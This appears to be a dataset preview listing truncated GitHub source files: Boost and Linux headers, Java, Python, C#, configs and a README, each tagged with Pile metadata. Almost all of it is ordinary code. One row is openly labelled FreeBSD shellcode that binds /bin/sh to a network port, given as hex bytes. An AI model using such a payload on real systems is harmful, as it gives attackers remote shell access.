text
stringlengths
2
99.9k
meta
dict
#ifndef BOOST_MPL_AUX_PREPROCESSOR_DEFAULT_PARAMS_HPP_INCLUDED #define BOOST_MPL_AUX_PREPROCESSOR_DEFAULT_PARAMS_HPP_INCLUDED // Copyright Aleksey Gurtovoy 2002-2004 // // Distributed under the Boost Software License, Version 1.0. // (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_...
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005 Intel Corporation * Copyright (C) 2009 Hewlett-Packard Development Company, L.P. * * Alex Chiang <achiang@hp.com> * - Unified x86/ia64 implementations * Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> * - Added _PDC for platforms with Intel CPUs */ #include <linux/export.h> #include ...
{ "pile_set_name": "Github" }
/* * Copyright (C) 2016 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by app...
{ "pile_set_name": "Github" }
/* FreeBSD shellcode that binds /bin/sh to port 41254 Assembly code and explanation will be released on safemode.org soon. Written by zillion (zillion at safemode.org) */ char shellcode[] = "\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0" "\x61\x50\xcd\x80\x89\xc2\x31\xc0...
{ "pile_set_name": "Github" }
# Copyright (C) 2008, Leon Woestenberg, Sidebranch, All Rights Reserved # Released under the MIT license (see packages/COPYING) #@TYPE: Machine #@Name: AMCC Canyonlands Development Platform #@DESCRIPTION: Machine configuration for the AMCC Canyonlands development platform http://www.amcc.com/Embedded/Downloads/460EX/ ...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2002-2020 "Neo4j," * Neo4j Sweden AB [http://neo4j.com] * * This file is part of Neo4j. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache....
{ "pile_set_name": "Github" }
/* * Copyright 2011 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
{ "pile_set_name": "Github" }
# encoding:utf-8 import sys import os sys.path.append("..") import numpy as np from mf import MF from prettyprinter import cpprint from collections import defaultdict from prettyprinter import cpprint from utility.matrix import SimMatrix from utility.similarity import pearson_sp from utility import util class TriCFBi...
{ "pile_set_name": "Github" }
/* * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" fi...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2001, Swedish Institute of Computer Science. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright *...
{ "pile_set_name": "Github" }
description: |- GRI-Mech Version 3.0 7/30/99 CHEMKIN-II format See README30 file at anonymous FTP site unix.sri.com, directory gri; WorldWideWeb home page http://www.me.berkeley.edu/gri_mech/ or through http://www.gri.org , under 'Basic Research', for additional information, contacts, and disclaimer Upda...
{ "pile_set_name": "Github" }
<?xml version="1.0"?> <configuration> <configSections> <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="host" type="System.Web.Web...
{ "pile_set_name": "Github" }
package com.github.windsekirun.rxsociallogin.naver import android.annotation.SuppressLint import android.content.Intent import android.support.v4.app.FragmentActivity import com.github.kittinunf.fuel.httpGet import com.github.windsekirun.rxsociallogin.BaseSocialLogin import com.github.windsekirun.rxsociallogin.RxSocia...
{ "pile_set_name": "Github" }
var chain = require('./chain'); /** * Creates a `lodash` wrapper instance with explicit method chain sequences enabled. * * @name chain * @memberOf _ * @since 0.1.0 * @category Seq * @returns {Object} Returns the new `lodash` wrapper instance. * @example * * var users = [ * { 'user': 'barney', 'age': 36 }...
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2007 Team XboxMediaCenter * http://xbmc.org * * This Program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later versi...
{ "pile_set_name": "Github" }
<p align="center"><img src="./media/logo.png"></p> <p align="center"> <a href="https://github.com/sindresorhus/awesome"><img alt="awesome" src="https://awesome.re/badge.svg"/></a> <img alt="PRs Welcome" src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg"/> <img alt="Mencionado en Comunidad Tecnológic...
{ "pile_set_name": "Github" }
<?php $TRANSLATIONS = array( "Timezone changed" => "هەرێمی کاتی گۆڕدرا", "Invalid request" => "داواکارى نادروستە", "Calendar" => "ڕۆژژمێر", "All day" => "هەموو ڕۆژ", "Title" => "ناونیشان", "Birthday" => "ڕۆژی لە دایک بوون", "by" => "له‌لایه‌ن", "unnamed" => "بێ ناو", "Week" => "هەفتە", "Month" => "مانگ", "Today" => "ئە...
{ "pile_set_name": "Github" }
import Vue from 'vue' import flushPromises from 'flush-promises' import { mount } from '@vue/test-utils' import Formulate from '@/Formulate.js' import FormulateInput from '@/FormulateInput.vue' import FormulateInputSlider from '@/inputs/FormulateInputSlider.vue' Vue.use(Formulate) /** * Test each type of slider elem...
{ "pile_set_name": "Github" }
/****************************************************************************** * * Copyright(c) 2009-2012 Realtek Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as * published by the Free Software Foundati...
{ "pile_set_name": "Github" }
#define require(name) ruby_require_internal(name, (unsigned int)sizeof(name)-1) int ruby_require_internal(const char *, int); void Init_enc(void) { if (require("enc/encdb.so") == 1) { require("enc/trans/transdb.so"); } }
{ "pile_set_name": "Github" }
#!/usr/bin/env perl # [[[ PREPROCESSOR ]]] # <<< PARSE_ERROR: 'ERROR ECOPAPL02' >>> # <<< PARSE_ERROR: 'Bareword "foo" not allowed' >>> # [[[ HEADER ]]] use RPerl; use strict; use warnings; our $VERSION = 0.001_000; # [[[ CRITICS ]]] ## no critic qw(ProhibitUselessNoCritic ProhibitMagicNumbers RequireCheckedSyscalls...
{ "pile_set_name": "Github" }
// ============================================================================ // // This software and related documentation is part of an INTERNAL release // of the Computational Geometry Algorithms Library (CGAL). It is not // intended for general use. // // ----------------------------------------------------------...
{ "pile_set_name": "Github" }
// // ViewController.swift // SimpleTable // // Created by Matias Cudich on 11/3/16. // Copyright © 2016 Matias Cudich. All rights reserved. // import UIKit import TemplateKit class ViewController: UIViewController { var app: Node? override func viewDidLoad() { super.viewDidLoad() var properties = ...
{ "pile_set_name": "Github" }
// Copyright 2017 JanusGraph Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agree...
{ "pile_set_name": "Github" }
// Jest Snapshot v1, https://goo.gl/fbAQLP exports[`ChannelMembers should match snapshot 1`] = ` <Connect(KeyboardLayout)> <Connect(StatusBar) /> <View style={ Object { "height": 38, "marginVertical": 5, "paddingLeft": 8, } } > <View style={null} > ...
{ "pile_set_name": "Github" }
/*************************************************************************** * * Author: "Sjors H.W. Scheres" * MRC Laboratory of Molecular Biology * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software F...
{ "pile_set_name": "Github" }
// CodeMirror2 mode/perl/perl.js (text/x-perl) beta 0.10 (2011-11-08) // This is a part of CodeMirror from https://github.com/sabaca/CodeMirror_mode_perl (mail@sabaca.com) CodeMirror.defineMode("perl",function(config,parserConfig){ // http://perldoc.perl.org var PERL={ // null - magic touch // 1 - ...
{ "pile_set_name": "Github" }
<table style="text-align: left;" border="1" cellpadding="2" cellspacing="2"> <tbody> <tr> <td style="white-space: nowrap; vertical-align: middle;"> <img alt="" src="Apollo32.png" style="width: 32px; height: 32px;" align="left"> </td> <td style="vertical-align: middle;"> These source-code files were transcribed from a p...
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2016, BayLibre, SAS. All rights reserved. * Author: Neil Armstrong <narmstrong@baylibre.com> * * Copyright (c) 2010, Code Aurora Forum. All rights reserved. * * Driver for Semtech SX150X I2C GPIO Expanders * The handling of the 4-bit chips (SX1501/SX150...
{ "pile_set_name": "Github" }
{ "_args": [ [ "babel-messages@^6.8.0", "C:\\code\\git-oa\\wechat-devtools\\src\\node_modules\\babel-core" ] ], "_cnpm_publish_time": 1462232652056, "_from": "babel-messages@>=6.8.0 <7.0.0", "_id": "babel-messages@6.8.0", "_inCache": true, "_installable": true, "_location": "/babel-m...
{ "pile_set_name": "Github" }
/* * Copyright (C) 2012-2020 Online-Go.com * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License as * published by the Free Software Foundation, either version 3 of the * License, or (at your option) any later version. * * This pr...
{ "pile_set_name": "Github" }
{ stdenv, fetchurl, fltk13, ghostscript }: stdenv.mkDerivation rec { pname = "flpsed"; version = "0.7.3"; src = fetchurl { url = "http://www.flpsed.org/${pname}-${version}.tar.gz"; sha256 = "0vngqxanykicabhfdznisv82k5ypkxwg0s93ms9ribvhpm8vf2xp"; }; buildInputs = [ fltk13 ]; postPatch = '' # ...
{ "pile_set_name": "Github" }
import { any, array, boolean, object, optional, string, union, } from "superstruct"; import { ActionConfig, LovelaceCardConfig, LovelaceViewConfig, ShowViewConfig, } from "../../../data/lovelace"; import { EntityId } from "../common/structs/is-entity-id"; import { Icon } from "../common/structs/is...
{ "pile_set_name": "Github" }
 Microsoft Visual Studio Solution File, Format Version 10.00 # Visual Studio 2008 # SharpDevelop 3.2.0.5777 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CodeEditor", "CodeEditor.csproj", "{A63D2EA4-D87C-459B-B57F-19A76A7ADAF0}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSoluti...
{ "pile_set_name": "Github" }
#include "PlexRemoteNavigationHandler.h" #include "PlexApplication.h" #include "ApplicationMessenger.h" #include "Application.h" #include "guilib/GUIAudioManager.h" #include "guilib/GUIWindowManager.h" #include <vector> #define LEGACY 1 /////////////////////////////////////////////////////////////////////////////////...
{ "pile_set_name": "Github" }
/*------------------------------------ ///\ Plywood C++ Framework \\\/ https://plywood.arc80.com/ ------------------------------------*/ #include <ply-build-repo/Module.h> // [ply module="ParserTest"] void module_ParserTest(ModuleArgs* args) { args->buildTarget->targetType = BuildTargetType::EXE; args->a...
{ "pile_set_name": "Github" }
[fs-uae-controller] name = Sony PLAYSTATION(R)3 Controller platform = linux [device] make = Sony model = DualShock 3 type = gamepad [sdl] guid = 030000004c0500006802000011010000 buttons = 19 hats = 0 axes = 27 balls = 0 [default] include = universal_gamepad axis_0_neg = lstick_left axis_0_pos = lstick_right axis_1_n...
{ "pile_set_name": "Github" }
 using System; using Android.App; using Android.Content; using Android.Runtime; using Android.Views; using Android.Widget; using Android.OS; using Android.Gms.Common.Apis; using Android.Gms.Wearable; using Android.Support.V4.App; using Common; using Android.Util; using Android.Text.Format; using Java.Interop; namesp...
{ "pile_set_name": "Github" }
// (C) Copyright Edward Diener 2011,2012,2013 // Use, modification and distribution are subject to the Boost Software License, // Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt). #if !defined(BOOST_TTI_MEMBER_TYPE_HPP) #define BOOST_TTI_MEMBER_TYPE_HPP #i...
{ "pile_set_name": "Github" }
#pragma once #include "IObject.h" namespace rho { namespace ruby { class IBoolean : public IObject { public: virtual ~IBoolean() {} virtual bool getBool() = 0; }; } }
{ "pile_set_name": "Github" }
// Boost.Geometry (aka GGL, Generic Geometry Library) // Copyright (c) 2014, Oracle and/or its affiliates. // Contributed and/or modified by Menelaos Karavelas, on behalf of Oracle // Licensed under the Boost Software License version 1.0. // http://www.boost.org/users/license.html #ifndef BOOST_GEOMETRY_ALGORITHMS_...
{ "pile_set_name": "Github" }
/* * dCache - http://www.dcache.org/ * * Copyright (C) 2016 Deutsches Elektronen-Synchrotron * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License as * published by the Free Software Foundation, either version 3 of the * License, o...
{ "pile_set_name": "Github" }
// Package docker provides utility functions for interfacing with Docker. package docker
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>SchemeUserState</key> <dict> <key>GooeySlideMenuDemo.xcscheme</key> <dict> <key>orderHint</key> <integer>0</integer> </dict> </di...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2018 THL A29 Limited, a Tencent company. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * ...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2003, 2019, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free ...
{ "pile_set_name": "Github" }
/** * Copyright (c) 2010-2020 Contributors to the openHAB project * * See the NOTICE file(s) distributed with this work for additional * information. * * This program and the accompanying materials are made available under the * terms of the Eclipse Public License 2.0 which is available at * http://www.eclipse....
{ "pile_set_name": "Github" }
// // Copyright (c) ZeroC, Inc. All rights reserved. // using System; using System.Collections.Generic; namespace Ice { namespace optional { public class InitialI : Test.InitialDisp_ { public override void shutdown(Ice.Current current) { current.adapter....
{ "pile_set_name": "Github" }
/* * Copyright (C) 2011, Mysema Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in wri...
{ "pile_set_name": "Github" }
/* * Copyright 2015 Goldman Sachs. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed ...
{ "pile_set_name": "Github" }
// Copyright 2010 the V8 project authors. All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of ...
{ "pile_set_name": "Github" }
//--------------------------------------------------------------------------- // This software is Copyright (c) 2012 Embarcadero Technologies, Inc. // You may only use this software if you are an authorized licensee // of Delphi, C++Builder or RAD Studio (Embarcadero Products). // This software is considered a Redis...
{ "pile_set_name": "Github" }
# udis86 - scripts/ud_itab.py # # Copyright (c) 2009, 2013 Vivek Thampi # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright...
{ "pile_set_name": "Github" }
# # DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER. # # Copyright (c) 1997-2010 Oracle and/or its affiliates. All rights reserved. # # The contents of this file are subject to the terms of either the GNU # General Public License Version 2 only ("GPL") or the Common Development # and Distribution License("CDDL"...
{ "pile_set_name": "Github" }
#region License // Copyright (c) 2007 James Newton-King // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation // files (the "Software"), to deal in the Software without // restriction, including without limitation the rights to use, // copy, ...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2003-2016 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file ex...
{ "pile_set_name": "Github" }
# 集群及应用监控 在前面的[安装heapster插件](heapster-addon-installation.md)章节,我们已经谈到Kubernetes本身提供了监控插件作为集群和容器监控的选择,但是在实际使用中,因为种种原因,再考虑到跟我们自身的监控系统集成,我们准备重新造轮子。 针对kubernetes集群和应用的监控,相较于传统的虚拟机和物理机的监控有很多不同,因此对于传统监控需要有很多改造的地方,需要关注以下三个方面: - Kubernetes集群本身的监控,主要是kubernetes的各个组件 - kubernetes集群中Pod的监控,Pod的CPU、内存、网络、磁盘等监控 - 集群内部应用的监控,针对应用本...
{ "pile_set_name": "Github" }
/* * EFI application network access support * * Copyright (c) 2016 Alexander Graf * * SPDX-License-Identifier: GPL-2.0+ */ #include <common.h> #include <efi_loader.h> #include <inttypes.h> #include <lcd.h> #include <malloc.h> DECLARE_GLOBAL_DATA_PTR; static const efi_guid_t efi_net_guid = EFI_SIMPLE_NET...
{ "pile_set_name": "Github" }
/* LICENSE ------- Copyright (C) 2007 Ray Molenkamp This source code is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this source code or the software it produces. Permission is granted to anyone ...
{ "pile_set_name": "Github" }
// OCMockito by Jon Reid, https://qualitycoding.org/ // Copyright 2020 Quality Coding, Inc. See LICENSE.txt #import "MKTAnswer.h" NS_ASSUME_NONNULL_BEGIN /*! * @abstract Method answer that executes a block. */ @interface MKTExecutesBlock : NSObject <MKTAnswer> - (instancetype)initWithBlock:(id (^)(NSInvocation...
{ "pile_set_name": "Github" }
/* ** $Id: ltable.c,v 2.32.1.2 2007/12/28 15:32:23 roberto Exp $ ** Lua tables (hash) ** See Copyright Notice in lua.h */ /* ** Implementation of tables (aka arrays, objects, or hash tables). ** Tables keep its elements in two parts: an array part and a hash part. ** Non-negative integer keys are all candidates to be...
{ "pile_set_name": "Github" }
#pragma once #include "CommandDispatcher.h" #include "CommandHandler.h" class FPluginHandler : public FCommandHandler { public: void RegisterCommands(); FExecStatus GetPort(const TArray<FString>& Args); FExecStatus SetPort(const TArray<FString>& Args); FExecStatus GetUnrealCVStatus(const TArray<FString>& Args); ...
{ "pile_set_name": "Github" }
// Copyright 2015 The oauth2 Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package bitbucket provides constants for using OAuth2 to access Bitbucket. package bitbucket import ( "golang.org/x/oauth2" ) // Endpoint is Bitbucket...
{ "pile_set_name": "Github" }
/******************************************************************************* Copyright (C) Marvell International Ltd. and its affiliates This software file (the "File") is owned and distributed by Marvell International Ltd. and/or its affiliates ("Marvell") under the following alternative licensing terms. Once y...
{ "pile_set_name": "Github" }
#ifndef UFTRACE_FILTER_H #define UFTRACE_FILTER_H #include <stdio.h> #include <stdint.h> #include <regex.h> #include "utils/rbtree.h" #include "utils/list.h" #include "utils/arch.h" /** * REGEX_CHARS: characters for regex matching. * * When one of these characters is in filter strings, * treat them as regex expr...
{ "pile_set_name": "Github" }
// Copyright 2014 The Prometheus Authors // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to...
{ "pile_set_name": "Github" }
/* GStreamer * Copyright (C) 2008 Jan Schmidt <jan.schmidt@sun.com> * * gstpluginloader.c: GstPluginLoader helper for loading plugin files * out of process. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Library General Public * License as published by t...
{ "pile_set_name": "Github" }
/* Copyright 2017 R. Thomas * Copyright 2017 Quarkslab * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by appli...
{ "pile_set_name": "Github" }
{ "images" : [ { "idiom" : "universal", "scale" : "1x" }, { "idiom" : "universal", "filename" : "v2_my_r@2x.png", "scale" : "2x" }, { "idiom" : "universal", "filename" : "v2_my_r@3x.png", "scale" : "3x" } ], "info" : { "version" : 1, ...
{ "pile_set_name": "Github" }
// Copyright 2019 Gregory Petrosyan <gregory.petrosyan@gmail.com> // // This Source Code Form is subject to the terms of the Mozilla Public // License, v. 2.0. If a copy of the MPL was not distributed with this // file, You can obtain one at https://mozilla.org/MPL/2.0/. package rapid_test import ( "fmt" "strconv" ...
{ "pile_set_name": "Github" }
{ "data": [ { "id": "9197ba55-0abc-4028-9bbe-269e530f8bd5", "name": "Fix Critical CVEs", "created_by": { "username": "jharting@redhat.com", "first_name": "Jozef", "last_name": "Hartinger" }, "created_at": "2018-12-05T08:19:36.641Z", "updated_by": { ...
{ "pile_set_name": "Github" }
// Package csm provides the Client Side Monitoring (CSM) client which enables // sending metrics via UDP connection to the CSM agent. This package provides // control options, and configuration for the CSM client. The client can be // controlled manually, or automatically via the SDK's Session configuration. // // Enab...
{ "pile_set_name": "Github" }
boto3 caniusepython3 requests
{ "pile_set_name": "Github" }
{ "images" : [ { "idiom" : "universal", "scale" : "1x" }, { "idiom" : "universal", "scale" : "2x", "filename" : "userinfo_relationship_indicator_compose@2x.png" }, { "idiom" : "universal", "scale" : "3x", "filename" : "userinfo_relationship_indicator...
{ "pile_set_name": "Github" }
'use strict'; // 25.4.1.5 NewPromiseCapability(C) var aFunction = require('./_a-function'); function PromiseCapability(C) { var resolve, reject; this.promise = new C(function ($$resolve, $$reject) { if (resolve !== undefined || reject !== undefined) throw TypeError('Bad Promise constructor'); resolve = $$r...
{ "pile_set_name": "Github" }
/* * (C) Copyright 2007-2008 * Stelian Pop <stelian@popies.net> * Lead Tech Design <www.leadtechdesign.com> * * SPDX-License-Identifier: GPL-2.0+ */ #include <common.h> #include <asm/io.h> #include <asm/arch/at91sam9260_matrix.h> #include <asm/arch/at91sam9_smc.h> #include <asm/arch/at91_common.h> #include <asm/...
{ "pile_set_name": "Github" }
-Wabi -Wabi-tag -Waggregate-return -Waggressive-loop-optimizations -Wall # -Waddress # -Warray-bounds # -Wc++0x-compat # -Wnarrowing # -Wchar-subscripts # -Wdelete-non-virtual-dtor # -Wenum-compare # -Wformat= # -Wformat-contains-nul # -Wformat-extra-args # -Wformat-nonliteral #...
{ "pile_set_name": "Github" }
/*********************************************************************** * Copyright (c) 2009, Secure Endpoints Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * - Redistribution...
{ "pile_set_name": "Github" }
version https://git-lfs.github.com/spec/v1 oid sha256:4928d22cff728bd4223b322d6b32037a61252c37fc8610dc2ff80abdbf4c4874 size 17936992
{ "pile_set_name": "Github" }
# Use more accurate measurements when laying out text. The measurements used by LiveCode to lay out text (the text "metrics") in versions prior to 8 were optimised for low-resolution bitmap fonts. In LiveCode 8, more accurate measurements are now being used by the field and other controls. For many existing stacks, t...
{ "pile_set_name": "Github" }
// This file is part of Silk.NET. // // You may modify and distribute Silk.NET under the terms // of the MIT license. See the LICENSE file for details. using System; #pragma warning disable 1591 namespace Silk.NET.OpenGLES { public enum GetVariantValueEXT { VariantValueExt = 0x87E4, Variant...
{ "pile_set_name": "Github" }
/** * Copyright 2017-2020 the original author or authors from the JHipster Online project. * * This file is part of the JHipster Online project, see https://github.com/jhipster/jhipster-online * for more information. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file ...
{ "pile_set_name": "Github" }
package jsoniter import ( "encoding/json" "io" "reflect" "sync" "unsafe" "github.com/modern-go/concurrent" "github.com/modern-go/reflect2" ) // Config customize how the API should behave. // The API is created from Config by Froze. type Config struct { IndentionStep int MarshalFloatWith6Digi...
{ "pile_set_name": "Github" }
#!/usr/bin/env bash ############################################################################## ## ## Gradle start up script for UN*X ## ############################################################################## # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to ...
{ "pile_set_name": "Github" }
/* * Copyright 2002-2020 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by a...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2006-2009 Erin Catto http://www.box2d.org * * This software is provided 'as-is', without any express or implied * warranty. In no event will the authors be held liable for any damages * arising from the use of this software. * Permission is granted to anyone to use this software for any purpos...
{ "pile_set_name": "Github" }
function (doc) { //PACT specific view for the case computed_ stored weeklys chedules. //key: username (no domain) //value: day of week, pact_id (patient), active_date, ended_date, index var days = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']; if (doc.doc_type == "C...
{ "pile_set_name": "Github" }
DELETE FROM `spell_script_names` WHERE `ScriptName`='spell_item_refocus';
{ "pile_set_name": "Github" }
var merge = require('webpack-merge') var prodEnv = require('./prod.env') module.exports = merge(prodEnv, { NODE_ENV: '"development"' })
{ "pile_set_name": "Github" }
start transaction; create table huge( a0 integer, a1 integer, a2 integer, a3 integer, a4 integer, a5 integer, a6 integer, a7 integer, a8 integer, a9 integer, a10 integer, a11 integer, a12 integer, a13 integer, a14 integer, a15 integer, a16 integer, a17 integer, a18 integer, a19 integer, a20 intege...
{ "pile_set_name": "Github" }
StartChar: X.subs Encoding: 1114255 -1 1254 Width: 459 VWidth: 0 Flags: HMW LayerCount: 3 Fore SplineSet 433 16 m 0 448 12 454 9 454 4 c 0 454 -1 447 -3 436 -3 c 0 421 -3 390 1 363 1 c 0 335 1 295 0 276 0 c 0 265 0 257 2 257 7 c 0 257 12 269 17 278 19 c 0 291 23 307 32 307 47 c 0 307 53 304 60 299 67 c 2 231 1...
{ "pile_set_name": "Github" }
// // RACKVOChannel.h // ReactiveCocoa // // Created by Uri Baghin on 27/12/2012. // Copyright (c) 2012 GitHub, Inc. All rights reserved. // #import "RACChannel.h" #import "EXTKeyPathCoding.h" #import "metamacros.h" /// Creates a RACKVOChannel to the given key path. When the targeted object /// deallocates, the c...
{ "pile_set_name": "Github" }
module Pkg /// We develop a generic model for key extraction and key derivation /// parametrized by a usage function from labels to derived keyed /// functionalities. /// /// * captures resumption derivations via bounded-recursive instantiation. /// * captures PRF-ODH double game /// * applicable to the full extract/e...
{ "pile_set_name": "Github" }
FROM nginx:alpine LABEL maintainer="Mahmoud Zalt <mahmoud@zalt.me>" COPY nginx.conf /etc/nginx/ COPY sites/default.conf /etc/nginx/sites-available/ ARG SERVER_ROOT RUN sed -i "s#{SERVER_ROOT}#$SERVER_ROOT#g" /etc/nginx/sites-available/default.conf # If you're in China, or you need to change sources, will be set CHA...
{ "pile_set_name": "Github" }
/*M/////////////////////////////////////////////////////////////////////////////////////// // // IMPORTANT: READ BEFORE DOWNLOADING, COPYING, INSTALLING OR USING. // // By downloading, copying, installing or using the software you agree to this license. // If you do not agree to this license, do not download, instal...
{ "pile_set_name": "Github" }
<?php class ServiceCards { private $bot, $system, $mysqli; function __construct(){ global $bot, $system, $mysqli; $this->bot = &$bot; $this->system = &$system; $this->db = &$mysqli; } function Save($value){ if(!empty($value['subsys'])){ if(!i...
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ldml SYSTEM "../../common/dtd/ldml.dtd"> <!-- Copyright © 1991-2014 Unicode, Inc. CLDR data files are interpreted according to the LDML specification (http://unicode.org/reports/tr35/) For terms of use, see http://www.unicode.org/copyright.html --> <ldml> <identity> ...
{ "pile_set_name": "Github" }
/*============================================================================= Copyright (c) 2001-2003 Joel de Guzman Copyright (c) 2001 Daniel Nuffer http://spirit.sourceforge.net/ Use, modification and distribution is subject to the Boost Software License, Version 1.0. (See accompanying file LIC...
{ "pile_set_name": "Github" }
!!! 5 %html{ lang: I18n.locale } %head %title - if content_for? :title = yield :title | = t(:product_name) = stylesheet_link_tag 'application', media: 'all' = javascript_include_tag 'application' = javascript_tag "lastKnownServerTime = '#{Time.now.to_i}'" = csrf_meta_ta...
{ "pile_set_name": "Github" }
name=Withering Boon image=https://magiccards.info/scans/en/mr/50.jpg value=3.514 rarity=U type=Instant cost={1}{B} ability=As an additional cost to cast SN, pay 3 life. effect=Counter target creature spell. timing=counter oracle=As an additional cost to cast Withering Boon, pay 3 life.\nCounter target creature spell.
{ "pile_set_name": "Github" }